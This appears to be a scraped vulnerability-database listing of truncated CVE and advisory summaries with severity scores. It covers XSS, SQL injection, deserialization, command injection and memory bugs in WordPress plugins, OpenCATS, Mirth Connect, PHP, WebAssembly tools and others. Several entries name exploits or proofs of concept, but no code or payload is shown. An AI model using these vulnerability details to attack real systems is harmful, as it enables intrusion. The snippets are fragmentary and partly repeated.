PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode <= 1.7 - Contributor+ Stored XSS
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks PoC [paypal_button...
5.6AI Score
0.0004EPSS
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via crafted POST request to...
7.1AI Score
0.0004EPSS
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single...
7.1AI Score
[SECURITY] Fedora 39 Update: rust-uu_test-0.0.23-3.fc39
test ~ (uutils) evaluate comparison and file type...
7.3AI Score
WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url...
6.1CVSS
6AI Score
0.001EPSS
Mirth Connect deserialization vulnerability
Added: 05/23/2024 Background Mirth Connect is an application which translates message standards for healthcare systems. Problem A deserialization vulnerability in Mirth Connect allows remote attackers to execute arbitrary commands by sending a specially crafted API request. Resolution Upgrade...
9.8CVSS
8AI Score
0.956EPSS
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the...
6.5CVSS
6.8AI Score
0.001EPSS
Emlog pro2.3 is vulnerable to Cross Site Request Forgery (CSRF) via twitter.php which can be used with a XSS vulnerability to access administrator...
6.5CVSS
6.2AI Score
0.001EPSS
5.5CVSS
5.8AI Score
0.001EPSS
5.5CVSS
5.5AI Score
0.001EPSS
wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component...
7.1CVSS
6.9AI Score
0.001EPSS
WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component...
5.5CVSS
5.8AI Score
0.001EPSS
Exploit for Out-of-bounds Write in Haxx Libcurl
CVE-2023-38545: Curl Vulnerability Proof of Concept This...
9.8CVSS
9.5AI Score
0.003EPSS
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via crafted POST request to...
0.0004EPSS
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via crafted POST request to...
7.6AI Score
0.0004EPSS
WebAssembly v1.0.29 was discovered to contain a heap overflow via the component component...
7.8CVSS
8AI Score
0.001EPSS
Mirth Connect deserialization vulnerability
Added: 05/23/2024 Background Mirth Connect is an application which translates message standards for healthcare systems. Problem A deserialization vulnerability in Mirth Connect allows remote attackers to execute arbitrary commands by sending a specially crafted API request. Resolution Upgrade...
9.8CVSS
9.9AI Score
0.956EPSS
Exploit for OS Command Injection in Php
CVE-2024-4577: Critical Vulnerability in PHP's CGI...
9.8CVSS
9.8AI Score
0.967EPSS
CVE-2023-33733 on Reportlab v3.6.12 This lab was set up to...
7.8CVSS
7.7AI Score
0.001EPSS
Use after free in Ozone in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via running a Wayland...
7.5CVSS
9.1AI Score
0.002EPSS
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via crafted POST request to...
0.0004EPSS
[SECURITY] Fedora 39 Update: wildcard-0.3.3-3.fc39
Wildcard gives you a nice and simple to use interface to test/practice regular...
7.2AI Score
Percona XtraBackup vulnerability
Releases Ubuntu 18.04 ESM Ubuntu 16.04 ESM Packages percona-xtrabackup - Open source backup tool for InnoDB and XtraDB Details It was discovered that in Percona XtraBackup, a local crafted filename could trigger arbitrary code...
7.8CVSS
7.6AI Score
0.0004EPSS
WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component...
5.5CVSS
5.8AI Score
0.0004EPSS
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their Authorization and XSRFToken tokens exposed to a third party when running an older jupyter-server...
7.6CVSS
6.7AI Score
0.001EPSS
AjaxDomainServlet in Zoho ManageEngine ServiceDesk Plus 10 allows User Enumeration. NOTE: the vendor's position is that this is intended...
5.3AI Score
0.03EPSS
WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote...
5.5CVSS
7AI Score
0.001EPSS
An issue in wasm2c 1.0.32, wasm2wat 1.0.32, wasm-decompile 1.0.32, and wasm-validate 1.0.32 allows attackers to cause a Denial of Service (DoS) via running a crafted...
7.5CVSS
6.9AI Score
0.001EPSS
wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component...
7.1CVSS
6.9AI Score
0.001EPSS
OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag deletion...
6.5CVSS
8.2AI Score
0.001EPSS
An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET...
5.4CVSS
7.3AI Score
0.001EPSS
OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors...
6.5CVSS
8.2AI Score
0.001EPSS
Garden provides automation for Kubernetes development and testing. Prior tov ersions 0.13.17 and 0.12.65, Garden has a dependency on the cryo library, which is vulnerable to code injection due to an insecure implementation of deserialization. Garden stores serialized objects using cryo in the...
9CVSS
8AI Score
0.001EPSS
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage...
6.1CVSS
6.1AI Score
0.001EPSS
Improper neutralization of input during web page generation allows an unauthenticated attacker to submit malicious Javascript as the answer to a questionnaire which would then be executed when an authenticated user reviews the candidate's submission. This could be used to steal other users’...
6.1CVSS
7AI Score
0.001EPSS
Cross-site request forgery is facilitated by OpenCATS failure to require CSRF tokens in POST requests. An attacker can exploit this issue by creating a dummy page that executes Javascript in an authenticated user's session when...
5.4CVSS
7AI Score
0.001EPSS
Improper neutralization of input during web page generation allows an authenticated attacker with access to a restricted account to submit malicious Javascript as the description for a calendar event, which would then be executed in other users' browsers if they browse to that event. This could...
5.4CVSS
6.8AI Score
0.001EPSS
OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage...
6.5CVSS
8.2AI Score
0.001EPSS
Exploit for Code Injection in Openplcproject Openplc V3 Firmware
CVE-2021-31630 Exploit CVE-2021-31630 Exploit PoC for...
8.8CVSS
8.5AI Score
0.006EPSS
** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled...
7.5CVSS
6.2AI Score
0.001EPSS
7.5CVSS
7.2AI Score
0.001EPSS
Cross-Site Request Forgery (CSRF) vulnerability in Rocket Elements Split Test For Elementor.This issue affects Split Test For Elementor: from n/a through...
4.3CVSS
5AI Score
0.0004EPSS
Galaxy is an open-source platform for data analysis. An arbitrary file read exists in Galaxy 22.01 and Galaxy 22.05 due to the switch to Gunicorn, which can be used to read any file accessible to the operating system user under which Galaxy is running. This vulnerability affects Galaxy 22.01 and...
8.6CVSS
6.9AI Score
0.001EPSS
Opencats v0.9.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component...
6.1CVSS
6.1AI Score
0.001EPSS
gradio is vulnerable to Command Injection. The vulnerability is due to improper neutralization of special elements within the test-functional.yml CI work flow, which results in unauthorized modification of the base repository or exfiltration of the GITHUB_TOKEN, COMMENT_TOKEN, or...
7.5CVSS
6.7AI Score
0.0004EPSS
libmodbus is vulnerable to a Use After Free. The vulnerability is caused by improper handling of the ctx->backend pointer, which allows attackers to cause a Denial of Service (DoS) via a crafted message sent to the...
6.4AI Score
EPSS
In the Linux kernel, the following vulnerability has been resolved: ACPI: CPPC: Use access_width over bit_width for system memory accesses To align with ACPI 6.3+, since bit_width can be any 8-bit value, it cannot be depended on to be always on a clean 8b boundary. This was uncovered on the...
7.3AI Score
0.0004EPSS
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID...
6.1CVSS
6.1AI Score
0.001EPSS
8.1CVSS
8.2AI Score
0.001EPSS
This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure TPMS_ATTEST. For the field TPM2_GENERATED magic of this structure any number can.....
4.3CVSS
6.8AI Score
0.0004EPSS